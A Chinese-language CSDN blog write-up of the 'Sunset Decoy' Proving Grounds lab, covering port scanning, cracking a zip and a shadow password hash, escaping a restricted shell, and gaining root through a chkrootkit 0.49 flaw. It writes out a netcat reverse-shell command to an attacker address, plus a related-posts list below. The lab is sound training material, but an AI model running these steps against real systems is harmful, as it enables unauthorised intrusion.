PG::SunsetDecoy

最新推荐文章于 2024-08-03 23:12:25 发布
最新推荐文章于 2024-08-03 23:12:25 发布
阅读量730 收藏
点赞数
分类专栏: PROVING GROUNDS 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/128098713
版权

nmap -Pn -p- -T4 --min-rate=1000 192.168.133.85
image.png
nmap -Pn -p 22,80 -sCV 192.168.133.85
image.png
查看80端口的页面,是一个压缩包
image.png
下载压缩包后尝试打开,需要密码,所以直接尝试爆破
image.png
得到解压密码 manuel
image.png
在/etc/shadow中找到了可以利用的地方

296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::

image.png
得到密码为server
image.png
使用ssh成功登录,但是有些问题,大部分命令无法执行
image.png
查找关键字“-rbash: dircolors: command not found
”得到解决方案
ssh登陆时添加命令 -t “bash --noprofile”
登录后添加环境变量 export PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin
image.png
在查看proof.txt文件时发现一个可执行文件
image.png
运行后选择5,运行AV Scan
image.png
根据提示AV Scan会运行,所以上传pspy查看一下进程
image.png
发现以root权限运行了chkrootkit-0.49的程序
exploit-db中搜索,发现了可以提权的方式
image.png
https://www.exploit-db.com/exploits/33899
根据提示,在/tmp目录下写入shell,当AV执行时就会得到shell
echo ‘/usr/bin/nc 192.168.49.133 4444 -e /bin/sh’ > /tmp/update
image.png

aya3t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机sunset:decoy渗透笔记
liver100day的博客
08-03 1151
这里写目录标题1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)3. 漏洞利用3.1 使用压缩包密码破解工具爆破压缩文件密码3.2 爆破用户密码3.3 ssh登录4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:sunset:decoy IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/sunset-decoy,505/ 2.信息收集 2.1 主机发现 要进行渗透
vulnhub靶机-sunsetdecoy
臭nana的博客
07-20 1511
1、找到靶机ip:192.168.0.129 nmap -sn 192.168.0.0/24 2、扫描靶机端口,除了22、80是开放状态,其他几个都是过滤状态 root@kali:~# nmap -p- -A 192.168.0.129 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.129 Host is up (0.0057s latency). Not shown: 65528 closed p
vulnhub-sunset: decoy-wp
yutianovo的博客
07-14 380
靶机信息 blog:http://blog.yutian233.xyz/ Easy/Intermediate (May variate depending on your background) It is recommended to run this machine in Virtualbox. This works better with VirtualBox rather than VMware https://www.vulnhub.com/entry/sunset-decoy,505/
掉坑指南 由于bash逃逸导致的命令无法执行解决方案
m0_57221101的博客
02-28 722
当存在目标靶机有rbash限制的时候可以选择noprofile方式进行登录 ssh username@IP -t "bash -noprofile" 可是这样登陆后会存在一种情况,就是由于没有载入profile,导致系统变量没有被加载,所以命令就全部不可以被执行,此时需要配置环境变量 export PATH=/usr/bin:/usr/sbin:/bin:/sbin:/usr/X11R6/bin 只需要在ssh登录之后,在目标机的shell界面增加上述的系统路径即可 ...
Matrix 3
猎荒者
03-11 907
So I won’t hesitate No more no more It cannot wait 0x00 环境准备 Kali-Linux(IP:10.10.16.128) Matrix 3 虚拟机 NAT 网络连接 0x01 主机发现 nmap -sP 10.10.16.0/24 0x02 端口扫描 nmap -A -v -sS -sV -p- -T4 10.10.16.151 ...
jsp分页标签pg:pager标签运用
y_dzaichirou的博客
12-22 2692
pager-taglib是一个用jsp标签库实现分页的工具,在它的demo中有实现好的各种常见分页方式,使用时只需pager-taglib.jar包即可,Pager会在给出的URL后面加上"?page.offset="来标识当前偏移量,使用时在jsp页面将pager-taglib的标签库引入:      标签介绍 1. :一切子标签都在它里面工作 省略>
pg:pager标签运用
Forever_YouSay
12-04 7064
pager-taglib是一个用jsp标签库实现分页的工具,在它的demo中有实现好的各种常见分页方式,使用时只需pager-taglib.jar包即可,Pager会在给出的URL后面加上"?page.offset="来标识当前偏移量,使用时在jsp页面将pager-taglib的标签库引入:      标签介绍 1. :一切子标签都在它里面工作 省略> items:
pg:错误: 关系 “xxx_xx“ 不存在
兔兔那麽可@
07-30 3217
修改数据库解决问题
PG::Error: ERROR: permission denied to create database
飞鸟与鱼
03-14 7710
使用普用户创建数据库时候 PG::Error: ERROR: permission denied to create database 解决方式: 使用postgres 登录 sudo -u postgres psql postgres=# ALTER ROLE xxxx CREATEROLE CREATEDB; xxxx: 普通用户名称 赋予超级权限 ALTER ...
pg:Python OpenGL图形框架
05-04
pg:Python图形框架 pg是用于Python的轻量级高级OpenGL图形框架。 这是一项正在进行的工作。 教程 此处提供了基本教程: 特征 许多OpenGL应用程序具有许多共同点,但是使用OpenGL时涉及很多样板。 这种高级框架使您...
slick-pg:PostgreSQLSlick扩展
02-05
光滑pg PostgreSQL扩展,支持一系列pg数据类型和相关的运算符/函数。 当前支持的pg类型: 阵列 约会时间 枚举 范围 Hstore 树 JSON格式 Inet / MacAddr text搜寻 postgis几何 当前支持的pg功能: 继承 复合类型...
mojo-pg:Mojolicious PostgreSQL
02-05
6. 错误处理:在可能出现错误的地方,捕获 `Mojo::Pg::Error` 类型的异常。 在 `mojo-pg-master` 文件夹中,你可以找到 `mojo-pg` 模块的源代码,这包括了模块的定义、测试用例和文档。通过阅读源代码和测试用例,...
pg:使用 postgresql 的实用程序脚本
06-08
PG 常见 postgres 命令行操作的包装脚本。 安装 使用 : $ basher install juanibiapina/pg 或者克隆存储库并将bin文件夹添加到您的路径中。 命令 pg list : 列出数据库 pg copy <origin> <target> :制作数据库...
fastify-pg:固定PostgreSQL插件
05-03
依存关系:安装npm i fastify fastify-plugin fastify-pg pg --save用法const pg = require ( 'fastify-pg' ) 或者import pg from 'fastify-pg' 注册插件fastify . register ( pg , options ) 该插件将在具有以下...
赛蓝企业管理系统 AuthToken/Index 身份认证绕过漏洞复现
0xSec
08-03 184
赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。
内网安全:多种横向移动方式
最新发布
8888的博客
08-03 542
DCOM:DCOM(分布式组件对象模型)是微软的一系列概念和程序接口。它支持不同的两台机器上的组件间的通信,不论它们是运行在局域网、广域网、还是Internet上。利用这个接口,客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求,使用DCOM进行横向移动的优势之一在于,在远程主机上执行的进程将会是托管COM服务器端的软件获取DCOM列表:实验前提:1.关闭防火墙2.必须有管理员权限。
云原生安全检测工具(容器安全、trivy、veinmind-tools)
墨痕诉清风的博客
07-31 579
例如上文的 mysql:5.7 镜像,在扫描镜像包含的 openssl 库时,会根据操作系统版本,去 trivy.db 的"Oracle Linux 7"、“openssl”桶中查询相关漏洞信息,并最终生成 CVE-2021-23840 漏洞告警。如果没有,则需要解析基础镜像,并根据其中的操作系统版本文件(etc/alpine-release、usr/lib/os-release、/etc/os-release 等),来确定基础镜像的操作系统版本。‍‍Trivy 的漏洞库,名叫 trivy-db​​。
【系统架构设计师】二十四、安全架构设计理论与实践①
帅次的博客
08-03 548
在信息系统的整个生命周期中,安全保障应包括技术、管理、人员和工程过程的整体安全,以及相关组织机构的健全等。目前,网络与信息安全风险类别可以分为人为蓄意破坏(被动型攻击,主动型攻击)、灾害性攻击、系统故障、人员无意识行为
Cannot resolve symbol 'pg:pager'
06-08
这个错误通常是由于没有正确引入PageTag库导致的。请确保在你的web应用程序中包含...<%@ taglib uri="http://displaytag.sf.net" prefix="pg" %> ``` 这将声明PageTag库中的pager标签。希望这可以帮助你解决这个问题!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值